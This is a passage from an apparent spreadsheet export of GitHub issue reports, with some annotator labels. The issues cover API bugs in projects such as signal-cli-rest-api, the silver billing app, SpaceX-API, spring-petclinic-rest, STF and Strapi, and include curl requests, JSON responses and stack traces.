crypto/rand.(*reader).Read(0xc000037780, {0xc0002d64d0, 0x10, 0x10}) /usr/local/go/src/crypto/rand/rand_unix.go:56 +0x108 io.ReadAtLeast({0xcfaa60, 0xc000037780}, {0xc0002d64d0, 0x10, 0x10}, 0x10) /usr/local/go/src/io/io.go:335 +0x90 io.ReadFull() /usr/local/go/src/io/io.go:354 github.com/gofrs/uuid.(*Gen).NewV4(0xc000616b90) /go/pkg/mod/github.com/gofrs/uuid@v4.4.0+incompatible/generator.go:262 +0x51 github.com/gofrs/uuid.NewV4() /go/pkg/mod/github.com/gofrs/uuid@v4.4.0+incompatible/generator.go:62 github.com/bbernhard/signal-cli-rest-api/client.(*JsonRpc2Client).GetReceiveChannel(0xc0006163c0) /tmp/signal-cli-rest-api-src/client/jsonrpc2.go:173 +0x42 github.com/bbernhard/signal-cli-rest-api/client.(*SignalClient).GetReceiveChannel(0x0?) /tmp/signal-cli-rest-api-src/client/client.go:738 +0x85 github.com/bbernhard/signal-cli-rest-api/api.(*Api).handleSignalReceive(0xc0000a68f8, 0xc000dac420, {0xc00049e0a0, 0xd}, 0xc0004981e0) /tmp/signal-cli-rest-api-src/api/api.go:393 +0x50 created by github.com/bbernhard/signal-cli-rest-api/api.(*Api).Receive in goroutine 105 /tmp/signal-cli-rest-api-src/api/api.go:513 +0x234 goroutine 49 [select]: github.com/bbernhard/signal-cli-rest-api/api.(*Api).handleSignalReceive(0xc0000a68f8, 0xc000392580, {0xc000388130, 0xd}, 0xc0003942a0) /tmp/signal-cli-rest-api-src/api/api.go:400 +0x172 created by github.com/bbernhard/signal-cli-rest-api/api.(*Api).Receive in goroutine 102 /tmp/signal-cli-rest-api-src/api/api.go:513 +0x234 goroutine 114 [select]: github.com/bbernhard/signal-cli-rest-api/api.wsPing(0xc000392580, 0xc0003942a0) /tmp/signal-cli-rest-api-src/api/api.go:470 +0x73 created by github.com/bbernhard/signal-cli-rest-api/api.(*Api).Receive in goroutine 102 /tmp/signal-cli-rest-api-src/api/api.go:514 +0x28d goroutine 59 [select]: github.com/bbernhard/signal-cli-rest-api/api.wsPing(0xc00034a580, 0xc0003502a0) /tmp/signal-cli-rest-api-src/api/api.go:470 +0x73 created by github.com/bbernhard/signal-cli-rest-api/api.(*Api).Receive in goroutine 104 /tmp/signal-cli-rest-api-src/api/api.go:514 +0x28d goroutine 108 [select]: github.com/bbernhard/signal-cli-rest-api/api.wsPing(0xc000dac420, 0xc0004981e0) /tmp/signal-cli-rest-api-src/api/api.go:470 +0x73 created by github.com/bbernhard/signal-cli-rest-api/api.(*Api).Receive in goroutine 105 /tmp/signal-cli-rest-api-src/api/api.go:514 +0x28d   Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? JSON-RPC Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/550</t>
  </si>
  <si>
    <t>Using UUID with Signal CLI REST API</t>
  </si>
  <si>
    <t>The problem Hi everyone, I'm having an issue with the Signal CLI REST API and could use some help. **Problem:** When I receive a message using the Signal CLI REST API, I only get a UUID as the sender information. Here is an example of a received message: json [ { "envelope": { "source": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "sourceNumber": null, "sourceUuid": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", "sourceName": "xxxx", "sourceDevice": 4, "timestamp": 1718816184062, "dataMessage": { "timestamp": 1718816184062, "message": "Test", "expiresInSeconds": 0, "viewOnce": false } }, "account": "+49xxxxxxxxxxxxx" } ]  As you can see, I only get the UUID (`xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx`) as the sender information. **Question:** How can I reply to this message when I only have the UUID? I tried sending a message using the following curl command, but it doesn't work: sh curl -X POST -H "Content-Type: application/json" \ -d '{ "message": "Hello!", "number": "+49xxxxxxxxxxxxx", "recipients": ["xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"] }' \ https://example.com/signal/v2/send  I receive the following error: json {"error":"java.lang.RuntimeException: org.signal.libsignal.usernames.MissingSeparatorException: Username must contain a '.'\n\tat org.asamk.signal.manager.helper.RecipientHelper.resolveRecipientByUsernameOrLink(RecipientHelper.java:105)\n\tat org.asamk.signal.manager.helper.RecipientHelper.resolveRecipient(RecipientHelper.java:93)\n\tat org.asamk.signal.manager.internal.ManagerImpl.sendMessage(ManagerImpl.java:622)\n\tat org.asamk.signal.manager.internal.ManagerImpl.sendMessage(ManagerImpl.java:598)\n\tat org.asamk.signal.manager.internal.ManagerImpl.sendMessage(ManagerImpl.java:726)\n\tat org.asamk.signal.commands.SendCommand.handleCommand(SendCommand.java:245)\n\tat org.asamk.signal.commands.CommandHandler.handleLocalCommand(CommandHandler.java:35)\n\tat org.asamk.signal.App.handleLocalCommand(App.java:278)\n\tat org.asamk.signal.App.handleCommand(App.java:179)\n\tat org.asamk.signal.App.init(App.java:144)\n\tat org.asamk.signal.Main.main(Main.java:56)\nCaused by: org.signal.libsignal.usernames.MissingSeparatorException: Username must contain a '.'\n\tat org.signal.libsignal.internal.Native.Username_Hash(Native Method)\n\tat org.signal.libsignal.usernames.Username.lambda$hash$6(Username.java:148)\n\tat org.signal.libsignal.internal.FilterExceptions.filterExceptions(FilterExceptions.java:143)\n\tat org.signal.libsignal.usernames.Username.hash(Username.java:148)\n\tat org.signal.libsignal.usernames.Username.\u003cinit\u003e(Username.java:57)\n\tat org.asamk.signal.manager.helper.RecipientHelper.getUsernameFromUsernameOrLink(RecipientHelper.java:137)\n\tat org.asamk.signal.manager.helper.RecipientHelper.resolveRecipientByUsernameOrLink(RecipientHelper.java:103)\n\t 10 more\n"}  It seems like the UUID is being interpreted as a username, which must contain a `.` (there is a similar question open but it does not mention the uuid problem). Is there a way to send a message directly to a UUID, or do I need to identify the sender differently? Am I perhaps using the API request incorrectly? Any help or example request would be greatly appreciated! Thank you in advance!  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/630</t>
  </si>
  <si>
    <t>Nested styled text not working</t>
  </si>
  <si>
    <t>The problem Currently it appears that it is not possible to send messages using nested styled text. For example text that is both spoiler and monospaced. For example:  curl -k -X POST -H "Content-Type: application/json" -d '{"message": "||spoiler only||", "number": "redacted", "recipients": ["redacted"], "text_mode": "styled"}' 'redacted/v2/send'  This returns spoiler correctly.  curl -k -X POST -H "Content-Type: application/json" -d '{"message": "`monospace only`", "number": "redacted", "recipients": ["redacted"], "text_mode": "styled"}' 'redacted/v2/send'  This returns monospace correctly.  curl -k -X POST -H "Content-Type: application/json" -d '{"message": "||`spoiler and monospace`||", "number": "redacted", "recipients": ["redacted"], "text_mode": "styled"}' 'redacted/v2/send'  However when combining both options only spoiler is visible. Combining styles is possible in Signal app. Would it be possible to allow these nested styles? Or is it possible now but requires some special escaping?  Are you using the latest released version? - [X] Yes  Have you read the troubleshooting page? - [X] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Normal Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/654</t>
  </si>
  <si>
    <t>Parameter notify_self only works for group chats</t>
  </si>
  <si>
    <t>The problem When sending a message the `notify_self` parameter set to false is only take effect when the recipient of the message is a group. I guess the reason is that the parameter is not being passed to the function [SignalCliSendRequest](https://github.com/bbernhard/signal-cli-rest-api/blob/42f10c3dd73826cb0c3019eae154abd272469e20/src/client/client.go#L793). I think it doesn't work either if a username is used, but I haven't tested it.  Release version shell  curl -X GET 'http://127.0.0.1:8999/v1/about' {"versions":["v1","v2"],"build":2,"mode":"native","version":"0.91","capabilities":{"v2/send":["quotes","mentions"]}}   Test curl to a group shell  curl -X POST -H "Content-Type: application/json" -d '{"message": "Hello World!", "number": "+XXX", "recipients": ["group.SDh0aW9PbVUze[]TL0VqND0="], "notify_self": false}' 'http://127.0.0.1:8999/v2/send' time="2025-02-09T13:01:53Z" level=debug msg="*) echo 'Hello World!' | signal-cli-native --config /home/.local/share/signal-cli -a +XXX send --message-from-stdin -g H8tio[]z0atS/Ej4="   Test curl to a phone number shell  curl -X POST -H "Content-Type: application/json" -d '{"message": "Hello World!", "number": "+XXX", "recipients": ["+XXX"], "notify_self": false}' 'http://127.0.0.1:8999/v2/send' time="2025-02-09T13:05:35Z" level=debug msg="*) echo 'Hello World!' | signal-cli-native --config /home/.local/share/signal-cli -a +XXX send --message-from-stdin +XXX --notify-self"   Are you using the latest released version? - [x] Yes  Have you read the troubleshooting page? - [x] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/bbernhard/signal-cli-rest-api/issues/657</t>
  </si>
  <si>
    <t>Group description missing from groups.</t>
  </si>
  <si>
    <t>The problem I am trying to get a group description, but both list_group and list_groups don't seem to return it. In the signal-cli documentation, they have this example listed which shows a group description being returned. REQUEST: `{"jsonrpc":"2.0","method":"listGroups","id":"my special mark"}` RESPONSE: `{"jsonrpc":"2.0","result":[{"id":"Pmpi+EfPWmsxiomLe9Nx2XF9HOE483p6iKiFj65iMwI=","name":"My Group","description":"Its special because it is mine.","isMember":true,"isBlocked":false,"members":["+33123456789","+440123456789"],"pendingMembers":[],"requestingMembers":[],"admins":["+33123456789","+440123456789"],"groupInviteLink":"https://signal.group/#CjQKIAtcbUw482i7bqvmJCwdgvg0FMif52N5v9lGg_bE4U3zEhCjHKSaPzWImMpnCbU8A1r0"}],"id":"my special mark"}` Do you know if this is a limitation with the API, or is the Signal-CLI documentation out of date? Thanks either way!  Are you using the latest released version? - [x] Yes  Have you read the troubleshooting page? - [x] Yes  What type of installation are you running? signal-cli-rest-api Docker Container  In which mode are you using the docker container? Native Mode  What's the architecture of your host system? x86-64  Additional information Also tried JSON-RPC mode, no change.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/104</t>
  </si>
  <si>
    <t>When creating a subscription the customer should be taken from URL</t>
  </si>
  <si>
    <t>Subscriptions have endpoint in the form: `customers/:id/subscriptions`. So, when creating a subscription, the customer must match the one in the URL and it shouldn't be settable through POST data.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/105</t>
  </si>
  <si>
    <t>Subscriptions should expose the subscription_id</t>
  </si>
  <si>
    <t>The subscription serializer should expose the subscription ID.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/161</t>
  </si>
  <si>
    <t>Invoice entry end date should be the end of cycle</t>
  </si>
  <si>
    <t>Billing entry `end_date` should be something like `2015-03-31` instead of `2015-04-01`</t>
  </si>
  <si>
    <t xml:space="preserve">just date format not in desiered format , not mention of is through api </t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/196</t>
  </si>
  <si>
    <t>Strange characters block editing of subscriptions</t>
  </si>
  <si>
    <t>We had a customer with a strange name including letter "" when we tried editing his subscription we received i thing a 404 or a 504 i cannot remember. I've changed the name into 'a' and then it worked.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/203</t>
  </si>
  <si>
    <t>Wrong data in invoices/proforma when subscription is canceled</t>
  </si>
  <si>
    <t>So in the middle of the month the customer decides to move. We cancel the subscription in billing and the expected result is that the new billing cycle invoice to have only the extra pageviews included on it and no more full month subscription. Well, the Billing subscription moved to ended, but the current month subscription package got invoiced wrongly on top of the expected extra pageviews.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/204</t>
  </si>
  <si>
    <t>Wrong invoiced data</t>
  </si>
  <si>
    <t>One instance got created on May 7-th ( viralrocks.trypl.com ) and on the invoice appeared the bucket for the 15 days free trial, one line with + one line with minus for the period 7-21-st may, then it only invoiced the subscription for June, skipping to invoice the period for 21-31-st may which costs us money</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/228</t>
  </si>
  <si>
    <t>Lines 640-671 from models.py are not correct</t>
  </si>
  <si>
    <t>Case: https://billing.presslabs.com/silver/proforma/179/ -- was generated incorrectly. The value of the prorated subscription after trial was added two times.</t>
  </si>
  <si>
    <t>not</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/289</t>
  </si>
  <si>
    <t>Error deleting proforma</t>
  </si>
  <si>
    <t>Sometimes deleting proformas gives server error 500</t>
  </si>
  <si>
    <t>insufficient decription</t>
  </si>
  <si>
    <t>500 error</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/353</t>
  </si>
  <si>
    <t>Payment method for wrong customer</t>
  </si>
  <si>
    <t>http://127.0.0.1:8000/customers/1/payment_methods/3/ Works even though the payment method is not linked with that specific customer.</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/384</t>
  </si>
  <si>
    <t>Creating a payment method without a given state through the api fails.</t>
  </si>
  <si>
    <t>{u'non_field_errors': [u"'state' must initially be one of (uninitialized, unverified, enabled)."]}</t>
  </si>
  <si>
    <t>https://github.com/silverapp/silver/issues/469</t>
  </si>
  <si>
    <t>Payment_methods GET should return expanded payment_processor</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/36</t>
  </si>
  <si>
    <t>core/cap issues</t>
  </si>
  <si>
    <t>Sorry for all the issues being reported. This one's two parts When fetching cap or core info for a single part (example: https://api.spacexdata.com/v1/parts/cores/B1036) it shouldn't return an array, just a single object Also, the wiki entry for cap endpoints is incorrect. It lists the url as https://api.spacexdata.com/v1/parts/caps/C106/ when it should be https://api.spacexdata.com/v1/parts/caps/C106 as the first url produces an error</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/398</t>
  </si>
  <si>
    <t>Launchpad/Landpad status field</t>
  </si>
  <si>
    <t>Model returned from the Launchpads endpoint contains `Status` field which is defined as enum (https://github.com/r-spacex/SpaceX-API/blob/master/docs/v4/launchpads/schema.md):  "status": { "type": "String", "enum": [ "active", "inactive", "unknown", "retired", "lost", "under construction" ], "required": true },  The model returned from the Landpads endpoint has also a similar one, but in the schema, it's defined just as a plain string (https://github.com/r-spacex/SpaceX-API/blob/master/docs/v4/landpads/schema.md):  "status": { "type": "String", "default": null },  Shouldn't be the second one exactly the same as the first one? From what I saw comparing data from both endpoints, this field has exactly the same meaning and the same values.</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/408</t>
  </si>
  <si>
    <t>Error code inconsistency between docs and API</t>
  </si>
  <si>
    <t>The documentation states (for every endpoint which returns a single object) that for request with non-existing in database ID should return 404 code (Not Found), but it seems that API returns 400 (Bad Request) - is this a bug or typo in docs? Personally I think that 404 would be more logical and descriptive than generic 400. For https://api.spacexdata.com/v4/dragons/5e9d058759b1ff75a7ad5f8f API returns "Not Found" text and 400 error code: ![image](https://user-images.githubusercontent.com/26147774/87666641-4157fb80-c769-11ea-98d2-6f4985f1dab9.png)</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/856</t>
  </si>
  <si>
    <t>cannot post query for upcoming launches</t>
  </si>
  <si>
    <t>posting data on this url  https://api.spacexdata.com/v4/launches/query with data  { "query": { "upcoming": true }, "options": { "limit": 1, "select": { "name": 1, "id": 1, "date_local": 1, "flight_number": 1, "details": 1, "links": 1, "date_precision": 1 }, "sort": { "flight_number": "asc" }, "populate": [ { "path": "launchpad", "select": { "name": 1, "full_name": 1 } }, { "path": "rocket", "select": { "name": 1, "id": 1 } } ] } }  Getting response **Cannot read property 'map' of undefined** **it was working few hours before the issue was raised, plz try to solve it fast as possible**</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/857</t>
  </si>
  <si>
    <t>Launches query (v4) with populate 'crew' options doesn't work</t>
  </si>
  <si>
    <t>I use the query for launches for my app as follows:  { "query": "", "options": { "populate": [ // other populate options works correct { "path": "crew", "select": "-launches" }, ], "pagination": false } }  Some days ago it starts to send broken response without crew populated on;ly with id in array. Is it error or feature mentioned in https://github.com/r-spacex/SpaceX-API/issues/842? Should I update my app with v5 launches query?</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/858</t>
  </si>
  <si>
    <t>Error on post to launches/query</t>
  </si>
  <si>
    <t>Hey, I'm getting an error "Cannot read property 'replace' of undefined" for every post request to the "api.spacexdata.com/v4/launches/query" if the request contains "populate" option. Yesterday everything worked fine, I suppose the cause lies in the last commits. Please, take a look</t>
  </si>
  <si>
    <t>https://github.com/r-spacex/SpaceX-API/issues/943</t>
  </si>
  <si>
    <t>Dragon C207 info outdated.</t>
  </si>
  <si>
    <t>Capsule `5f6f99fddcfdf403df379709` represents outdated information. Firstly, a wrong count of `water_landings`. It is currently showing 1, but after Insipration4 splashed down it should increase to 2 (Crew-1 and Inspiration4 water landings). Also the `last_update` value seems a little off. It refers to Crew-1 splashdown which happened in May and not Inspiration4. Reuse count and a launches list are fine. ![image](https://user-images.githubusercontent.com/77860645/140494064-ead07b13-e139-4003-97aa-0b5dd9104d0c.png)</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/9</t>
  </si>
  <si>
    <t>Request body of POST /pets</t>
  </si>
  <si>
    <t>I am using spring-petclinic-rest as an example of a REST API. As a part of that, I am attempting to perform a POST request against /pets in order to create a new Pet record. It however seems that the 'id' field is required, with the associated behaviour that - I can replace the contents of an existing pet via a POST to /pets (which does return a 201 instead of a 200) - if I want to create an entirely new Pet record, I need to know which values for 'id' are not in use, rather than leave 'id' out and have an available value be assigned to it</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/17</t>
  </si>
  <si>
    <t>self-href urls are not proper in rest api</t>
  </si>
  <si>
    <t>I was trying to run spring-petclinic-rest in my local. I was able to run and build properly. But when I hit the URL http://localhost:9966/petclinic/ This shows me below response ` { "_links" : { "petTypes" : { "href" : "http://localhost:9966/petclinic/petTypes" }, "vets" : { "href" : "http://localhost:9966/petclinic/vets" }, "users" : { "href" : "http://localhost:9966/petclinic/users" }, "visits" : { "href" : "http://localhost:9966/petclinic/visits" }, "pets" : { "href" : "http://localhost:9966/petclinic/pets" }, "specialties" : { "href" : "http://localhost:9966/petclinic/specialties" }, "owners" : { "href" : "http://localhost:9966/petclinic/owners" }, "profile" : { "href" : "http://localhost:9966/petclinic/profile" } } } ` Upon clicking vets link from above, I got below response - ` { "firstName" : "Helena", "lastName" : "Leary", "_links" : { "self" : { "href" : "http://localhost:9966/petclinic/vets/1" }, "vet" : { "href" : "http://localhost:9966/petclinic/vets/1" }, "specialties" : { "href" : "http://localhost:9966/petclinic/vets/1/specialties" } } } ` But when I click on the self href url- it end up in being GET method not supported exception. Actual URL for getting vets by id is http://localhost:9966/petclinic/api/vets/1 In code I could not find where it is configured or from where these links are coming. Can someone suggest how to add api in self href urls.</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/61</t>
  </si>
  <si>
    <t>petDto not working propely</t>
  </si>
  <si>
    <t>petDto is creating the following body { "birthDate": "Mon Sep 06 21:00:00 UTC 2010", "name": "Leo", "type": { "name": "cat" }, "typeId": 1 } with this the push operation is refused and the following message is returned ( that is after changing the date to the yyyy-MM-dd format ) cache-control: no-cacheno-storemax-age=0must-revalidate connection: close content-length: 0 date: Sat20 Nov 2021 06:08:20 GMT errors: [{"objectName":"petDto","fieldName":"id","fieldValue":"null","errorMessage":"not null"},{"objectName":"petDto","fieldName":"type.id","fieldValue":"null","errorMessage":"not null"}] expires: 0 pragma: no-cache vary: OriginAccess-Control-Request-MethodAccess-Control-Request-Headers x-content-type-options: nosniff x-frame-options: DENY x-xss-protection: 1; mode=block</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/86</t>
  </si>
  <si>
    <t>Create pet endpoint</t>
  </si>
  <si>
    <t>According to the open API spec, there is the following endpoint to create a pet: `http://localhost:9966/petclinic/api/pets`, however I am getting a `501` error whenever I send a POST request to that URL, indicating that it is not implemented. Is this the case?</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/102</t>
  </si>
  <si>
    <t>Location header on specialties endpoint is wrong</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/blob/master/src/main/java/org/springframework/samples/petclinic/rest/controller/SpecialtyRestController.java#L80 describes the /specialties endpoint as /specialtys on the location header</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/130</t>
  </si>
  <si>
    <t>Handle 404 error while adding a pet to an owner</t>
  </si>
  <si>
    <t>The `POST /owners/{ownerId}/pets` does not return a 404 error when the `ownerId` does not exist but an error `400`  { "className": "org.springframework.dao.DataIntegrityViolationException", "exMessage": "could not execute statement [integrity constraint violation: foreign key no parent ; FK_PETS_OWNERS table: PETS value: 222] [insert into pets (birth_date,name,owner_id,type_id,id) values (?,?,?,?,default)]; SQL [insert into pets (birth_date,name,owner_id,type_id,id) values (?,?,?,?,default)]; constraint [FK_PETS_OWNERS]" }  Same behaviour when a Pet does not exist</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/145</t>
  </si>
  <si>
    <t>Bad Request Error while trying to get pet for a specific owner</t>
  </si>
  <si>
    <t>The `GET/api/owners/{id}/pets/{petId}` endpoint seems to be returning an incorrect response or handling errors improperly. This issue was encountered while attempting to retrieve specific pet for a given owner. cURL: bash curl -X 'GET' \ 'http://localhost:9966/petclinic/api/owners/1/pets/1' \ -H 'accept: application/json'  Response on Swagger-ui: `Error: response status is 400` I tried to debug code and found out that it comes from `OwnerRestController` : java @RestController @RequestMapping("/api") public class OwnerRestController implements OwnersApi { //  @PreAuthorize("hasRole(@roles.OWNER_ADMIN)") @Override public ResponseEntity&lt;PetDto&gt; getOwnersPet(Integer ownerId, Integer petId) { Owner owner = this.clinicService.findOwnerById(ownerId); Pet pet = this.clinicService.findPetById(petId); if (owner == null || pet == null) { return new ResponseEntity&lt;&gt;(HttpStatus.NOT_FOUND); } else { if (!pet.getOwner().equals(owner)) { return new ResponseEntity&lt;&gt;(HttpStatus.BAD_REQUEST); } else { return new ResponseEntity&lt;&gt;(petMapper.toPetDto(pet), HttpStatus.OK); } } } }  The problem is here : `if (!pet.getOwner().equals(owner)) {}`: the `equals()` check returns `false`. Ive checked the entity Owner class and found out that it doesn't have `equals` and `hashcode()` (same for Pet entity class), which is not recommended !</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/165</t>
  </si>
  <si>
    <t>Error when executing requests with basic auth under non-admin</t>
  </si>
  <si>
    <t>After creating a user with ROLE_OWNER_ADMIN and trying to make requests using Basic Authentication, I get a 401 Unauthorized response. The following error appears in the logs:  java.lang.IllegalArgumentException: There is no PasswordEncoder mapped for the id "null" at org.springframework.security.crypto.password.DelegatingPasswordEncoder$UnmappedIdPasswordEncoder.matches(DelegatingPasswordEncoder.java:289) at org.springframework.security.crypto.password.DelegatingPasswordEncoder.matches(DelegatingPasswordEncoder.java:237) at org.springframework.security.config.annotation.authentication.configuration.AuthenticationConfiguration$LazyPasswordEncoder.matches(AuthenticationConfiguration.java:321) at org.springframework.security.authentication.dao.DaoAuthenticationProvider.additionalAuthenticationChecks(DaoAuthenticationProvider.java:86) at org.springframework.security.authentication.dao.AbstractUserDetailsAuthenticationProvider.authenticate(AbstractUserDetailsAuthenticationProvider.java:147) at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:182) at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:201) at org.springframework.security.authentication.ObservationAuthenticationManager.lambda$authenticate$1(ObservationAuthenticationManager.java:54) at io.micrometer.observation.Observation.observe(Observation.java:565) at org.springframework.security.authentication.ObservationAuthenticationManager.authenticate(ObservationAuthenticationManager.java:53) at org.springframework.security.web.authentication.www.BasicAuthenticationFilter.doFilterInternal(BasicAuthenticationFilter.java:187) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:116) at org.springframework.security.web.ObservationFilterChainDecorator$ObservationFilter.wrapFilter(ObservationFilterChainDecorator.java:240)</t>
  </si>
  <si>
    <t>https://github.com/spring-petclinic/spring-petclinic-rest/issues/220</t>
  </si>
  <si>
    <t>PUT /api/owners/{ownerId}/pets/{petId} Endpoint Not Implemented</t>
  </si>
  <si>
    <t>The `PUT /api/owners/{ownerId}/pets/{petId}` endpoint is defined in the OpenAPI spec, but has not been implemented in the application's controller layer. When sending a request to this endpoint, the API returns: `HTTP 501 Not Implemented` ![Image](https://github.com/user-attachments/assets/14aa9e59-d67d-4291-86ff-7e48f4ebfcef) - The OpenAPI spec defines a `PUT method` for `/api/owners/{ownerId}/pets/{petId}`. - However, I checked both files ([`OwnerRestController.java`](../blob/master/src/main/java/org/springframework/samples/petclinic/rest/controller/OwnerRestController.java) and [`PetRestController.java`](../blob/master/src/main/java/org/springframework/samples/petclinic/rest/controller/PetRestController.java) to make sure if either of them has the corresponding method, but it does not contain a method to handle this route. - Impact that i see: - It is currently not possible to validate a owner's pet data updates via the REST API. - The documentation is out of sync with the actual implementation, which may confuse API consumers. - With this issue, the development of a second API test scenario with the recently implemented Newman in #219 is unfeasible. ## What we can do? - Implement the PUT method in the corresponding controller to handle pet updates. - Ensuring input validation matches constraints defined in the OpenAPI spec - Returns `204 No content` or `200 OK` with the updated pet object _(The latter [200], would facilitate assertion in Postman + Newman test scenarios.)_ - Add appropriate unit and/or integration tests</t>
  </si>
  <si>
    <t>https://github.com/openstf/stf/issues/735</t>
  </si>
  <si>
    <t>Bad filtering of Battery Level and Battery Temp</t>
  </si>
  <si>
    <t>&lt;!-- *Before creating an issue please make sure you are using the latest version of STF.* --&gt; **Description:** During filtering devices via Battery Level or Battery Temp filer, I noticed, that results for query like: batteryLevel: &gt; 20 Did not return Android devices passing this criteria. The same issue I observed when I tried to filter devices using this query: batteryTemp: &gt;20 STF source code checkout with : d5ab5fd83d2e9a1dab2c61dc42b0ba999a6dbb1a **Steps to reproduce** A) Insert in input tag with name="deviceFilter" this query: batteryLevel: &gt;50 **What is the expected behavior?** We should expect to see only devices which battery level is bigger then 50%. But we see only devices, which body contains 50%. B) Insert in input tag with name="deviceFilter" this query: batteryTemp: &lt;40 **What is the expected behavior?** We should expect to see only devices which battery temp is lower then 40C. But we see only devices, which body contains 40. **Investigation**: The problem is mostly connected with using text filtering for both of params: Battery Level and Battery Temp. stf/res/app/device-list/column/device-column-service.js: ln340 As we can see both of params are marked as TextCell. To parse them as values we might to add additional extra checking in : stf/res/app/device-list/column/device-column-service.js: ln340 to parse those data properly by adding this part: , filter: function(item, filter) { if ( options.title == "Battery Level" || options.title == "Battery Temp" ) { //Exception in TextCell. We want to filter after integer values for two columns, Battery Level and Battery Temp var remove_unit_character = '' switch (options.title){ case "Battery Level": remove_unit_character = "%" break case "Battery Temp": remove_unit_character = "C" break } var parsed_value = parseInt((options.value(item)).replace(remove_unit_character,'')) return filterOps[filter.op || '=']( parsed_value , Number(filter.query) ) } else{ return filterIgnoreCase(options.value(item), filter.query) } }</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/20271</t>
  </si>
  <si>
    <t>Filter by text field with "&amp;" symbol doesn't work</t>
  </si>
  <si>
    <t>## Bug report  Required System information - Node.js version: 18.20.2 - Yarn version: 1.22.22 - Strapi version: v4.24.1 - Database: postgres - Operating system: darwin-arm64 - Is your project Javascript or Typescript: Javascript  Describe the bug Filter by text field with "&amp;" symbol doesn't work. Search string is cut up to &amp; symbol and no results with "is" operand  Steps to reproduce the behavior 1. Create any entity at collection type that text field contains ampersand (&amp;) symbol. Eg, create article with title "Test article &amp; issue reproduce" ![image](https://github.com/strapi/strapi/assets/46565276/45583861-aee0-4676-a799-e95fd37bd7c9) 2. Go to list of collection type and using "Filters" button select text field, "is" operand and text with &amp; symbol ![image](https://github.com/strapi/strapi/assets/46565276/9f4de5c7-ebe8-4cc0-a419-741dec696377) 3. Click "Add filter" 4. Check what filter is applied ![image](https://github.com/strapi/strapi/assets/46565276/8358f163-5c7b-4177-ad09-520b90d967cb)  Expected behavior Filter should be applied correctly and display found record, like if there are no &amp; symbol in search: ![image](https://github.com/strapi/strapi/assets/46565276/415c28ca-fb0a-447e-940f-7aa27f65afed)  Additional context Some details from network tab: Request URL: `http://127.0.0.1:1337/content-manager/collection-types/api::article.article?page=1&amp;pageSize=10&amp;sort=title:ASC&amp;filters[$and][0][title][$eq]=Test%20article%20&amp;%20issue%20reproduce=` Query parameters that applied:  page: 1 pageSize: 10 sort: title:ASC filters[$and][0][title][$eq]: Test article issue reproduce:  ![image](https://github.com/strapi/strapi/assets/46565276/fa98341b-2dcd-4b3f-9883-54c8c2e48e86)</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/20383</t>
  </si>
  <si>
    <t>[v5] Using pagination query params at root level of query returns incorrect error</t>
  </si>
  <si>
